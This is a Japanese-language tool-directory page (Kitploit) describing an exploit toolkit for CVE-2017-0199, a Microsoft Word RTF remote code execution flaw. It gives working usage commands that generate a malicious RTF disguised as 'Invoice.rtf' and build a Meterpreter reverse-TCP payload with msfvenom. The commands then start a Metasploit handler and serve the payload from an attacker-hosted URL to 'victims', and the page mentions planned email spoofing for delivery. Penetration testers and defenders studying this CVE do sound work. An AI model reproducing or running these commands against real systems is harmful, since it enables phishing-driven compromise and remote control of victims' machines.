Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v2.0 は、Microsoft RTF RCE を迅速かつ効果的に悪用するための便利な Python スクリプトです。複雑な設定を必要とせず、悪意のある RTF ファイルを生成し、メタスプロイト / メータープリター / その他のペイロードを被害者に配信できます。 | Kitploit
ツール/GitHubGitHub/exploit-install/cve-2017-0199
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubexploit-install/cve-2017-0199

CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v2.0 は、Microsoft RTF RCE を迅速かつ効果的に悪用するための便利な Python スクリプトです。複雑な設定を必要とせず、悪意のある RTF ファイルを生成し、メタスプロイト / メータープリター / その他のペイロードを被害者に配信できます。

リポジトリを見る
799年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイトツールキット CVE-2017-0199 - v2.0

エクスプロイトツールキット CVE-2017-0199 - v2.0 は、Microsoft RTF RCE を迅速かつ効果的に悪用するための便利な Python スクリプトです。複雑な設定を必要とせず、悪意のある RTF ファイルを生成し、Metasploit / Meterpreter ペイロードを被害者に配信できます。

ビデオチュートリアル

https://youtu.be/42LjG7bAvpg

リリースノート:

スクリプトに以下の機能を導入

root@kitploit:~
- ツールキットを使用して悪意のある RTF ファイルを生成
- 小さな HTA + Web サーバーとしてのエクスプロイトモードでツールキットを実行

バージョン: Python 2.7.13

将来のリリース:

以下の機能に取り組んでいます

root@kitploit:~
- メールスプーフィングを使用して、生成された悪意のある RTF を自動的に被害者に送信
	

例:

  • 手順 1: 以下のコマンドを使用して悪意のある RTF ファイルを生成し、被害者に送信します

    構文:

    root@kitploit:~
      # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    

    例:

    root@kitploit:~
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
    
  • 手順 2 (オプション、MSF ペイロードを使用する場合): Metasploit ペイロードを生成し、ハンドラーを起動します

    例:

    ペイロードの生成:

    root@kitploit:~
      # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    

    ハンドラーの起動:

    root@kitploit:~
      # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
    
  • 手順 3: ペイロードを配信するためにエクスプロイトモードでツールキットを起動します

    構文:

    root@kitploit:~
      # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    

    例:

    root@kitploit:~
      # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    

コマンドライン引数:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

これは CVE-2017-0199 (Microsoft Word RTF RCE) を悪用するための便利なツールキットです

モード:

-M gen                                          悪意のある RTF ファイルのみを生成

     悪意のある RTF ファイルを生成:

      -w <Filename.rtf>                   悪意のある RTF ファイルの名前 (このファイルを被害者と共有します)。

      -u <http://attacker.com/test.hta>   HTA ファイルへのパス。通常、これはこのツールが実行されているドメインまたは IP である必要があります。

                                             例えば、http://attackerip.com/test.hta (この URL は悪意のある RTF ファイルに含まれ、

                                             被害者が悪意のある RTF ファイルを開くとリクエストされます。)
-M exp                                          エクスプロイトモードを起動

     エクスプロイト:

      -p <TCP ポート:デフォルト 80>         ローカルポート番号。

      -e <http://attacker.com/shell.exe>   ターゲットで実行する必要がある実行可能ファイル / Meterpreter シェル / ペイロードのパス。

      -l </tmp/shell.exe>                  実行可能ファイル / Meterpreter シェル / ペイロードのローカルパス (ペイロードがローカルでホストされている場合)。

免責事項

このプログラムは教育目的のみです。許可なく使用しないでください。通常の免責事項が適用されます。特に、私 (bhdresh) は、これらのプログラムによって提供される情報や機能を直接または間接的に使用したことによって生じるいかなる損害についても責任を負いません。作者またはインターネットプロバイダーは、これらのプログラムまたはその派生物の内容や誤用について一切の責任を負いません。このプログラムを使用することにより、これらのプログラムの使用によって生じるいかなる損害 (データ損失、システムクラッシュ、システム侵害など) も bhdresh の責任ではないことを受け入れたものとみなされます。

クレジット

@nixawk (RTF サンプル), @bhdresh

バグ、問題、機能リクエスト

明らかに、私はフルタイムの開発者ではないため、多少の問題が発生する可能性があります

バグや問題は [email protected] まで報告してください

ツールをダウンロード